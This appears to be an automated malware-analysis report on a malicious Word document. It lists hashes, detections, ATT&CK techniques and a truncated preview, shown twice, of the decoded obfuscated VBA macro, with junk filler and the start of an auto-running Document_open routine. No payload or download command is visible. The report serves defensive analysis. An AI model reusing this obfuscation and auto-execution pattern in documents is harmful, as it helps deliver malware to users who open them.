Office (OLE) malware analysis — malicious · 6fc82ca62290e968

MALICIOUS

Office (OLE)

158.1 KB Created: 2018-07-23 11:08:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 255634db8d9523706827121a4356c147 SHA-1: 5a1dca6d7bf0a86292b6a3d9f74679ee9c541f98 SHA-256: 6fc82ca62290e96817a853633d9a4c0ef58c48fe60d55999c6a3ac3a0c924da4

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and 'Shell()' call indicate that the macros are designed to execute arbitrary code. The ClamAV detection further confirms its malicious nature. The primary function of the VBA script appears to be executing commands via the Shell() function, likely to download and execute a second-stage payload.

Heuristics 5

ClamAV: Doc.Malware.Valyria-10026440-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29534 bytes
SHA-256: `1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mVMLiwfHzQGmN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function DqGrcBsalmcUp() On Error Resume Next If HlPMG Xor 11 Then ElseIf OfOpP Eqv dKPwb Then If dWETnc = lBSAVo Then GEzZJ = Oct(STdfwX * 41517) End If End If If dBprN Xor 11 Then ElseIf JEozm Eqv UAvftB Then If KZNpmr = KtZXQG Then RXRLd = Oct(rzzIbW * 4692) End If End If If Truqnu Xor 11 Then ElseIf ChnwNp Eqv LznMI Then If DHznv = hVYKml Then fHNTYB = Oct(AJrjzW * 52570) End If End If If hACWV Xor 11 Then ElseIf uQLDA Eqv OPfRhj Then If DciTP = INaEOP Then dqMYUt = Oct(QWHFIc * 78715) End If End If If SDlhBr Xor 11 Then ElseIf ZUYTz Eqv QiANH Then If pimowS = NEKYwZ Then rLLNl = Oct(woQlTI * 4604) End If End If End Function Private Function UQjFdMtH() On Error Resume Next If iKYVLU <= GqVAr Then Set kLtVb = PJTpTl cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs) End If If tFsdQd <= BiGTT Then Set VltERT = ERAzvZ UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD) End If If FIijw Xor 11 Then ElseIf RVQivN Eqv fGJHRd Then If kzCrO = lDlFoa Then jQwqSw = Oct(tIwojS * 76101) End If End If If MUdWBK Xor 11 Then ElseIf JMziPK Eqv XtPQp Then If XiZQp = EZBuU Then iMWff = Oct(fmnSq * 97927) End If End If If WRrGJ <= DzPIVu Then Set zbWvh = ZbAco NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv) End If End Function Private Function YSTjndVYH() On Error Resume Next If ADPCwX Xor 11 Then ElseIf iznrGt Eqv QRDNo Then If QJXBYV = uIRXLz Then zhnLsi = Oct(ofPNp * 88771) End If End If If flIGO Xor 11 Then ElseIf VKjKBj Eqv GWWoiL Then If utzfm = tYsjY Then ioqwB = Oct(OModO * 97741) End If End If If ttFjWc Xor 11 Then ElseIf jNidpz Eqv jPjHT Then If iirVF = cdHnia Then wPXRb = Oct(wFAahO * 86621) End If End If If wrcAmL Xor 11 Then ElseIf NEqBc Eqv GCfLs Then If RamjQS = CDQKnQ Then sWVGC = Oct(uIDJn * 12894) End If End If If tjFocE Xor 11 Then ElseIf LLHLir Eqv AwuDk Then If MjhZI = iJXdw Then nwJUK = Oct(KMcjK * 25732) End If End If If zzhib Xor 11 Then ElseIf NPCki Eqv zOYZvC Then If BKIwEi = MiDJG Then QNiIG = Oct(zlkAV * 64745) End If End If If CLdaX Xor 11 Then ElseIf NBUSF Eqv CnmZGV Then If dHTOq = QSwlCO Then GIWdCF = Oct(nwMLwT * 46038) End If End If End Function Private Function wrzHrQbvhRSf() On Error Resume Next If sIzRMo Xor 11 Then ElseIf LVLEh Eqv wIrdQJ Then If IBTYu = FrPnK Then OVqLd = Oct(ZKnNj * 88657) End If End If If nCNhD Xor 11 Then ElseIf ZalrpZ Eqv Ljjwh Then If DSIHw = Hrzcu Then ZhVNC = Oct(ikUbnk * 98644) End If End If If OPoWC Xor 11 Then ElseIf scGLwP Eqv FDCMMb Then If mpHnU = dPBjzl Then YnwHK = Oct(pjfTz * 18218) End If End If If zNaHR Xor 11 Then ElseIf toGiuQ Eqv vwZwr Then If PsAzj = Nwjbi Then IaKId = Oct(UcVjt * 29164) End If End If If zpbolu Xor 11 Then ElseIf cSQBIa Eqv DYTBSF Then If oUQkE = jUanl Then KZBFvG = Oct(AVYjF * 67510) End If End If End Function Private Sub Document_open() On Error Resume Next If ltMnWY Xor iCwVIY Then For BkhpY = 22 To Jqsfr kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva ... (truncated)

SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.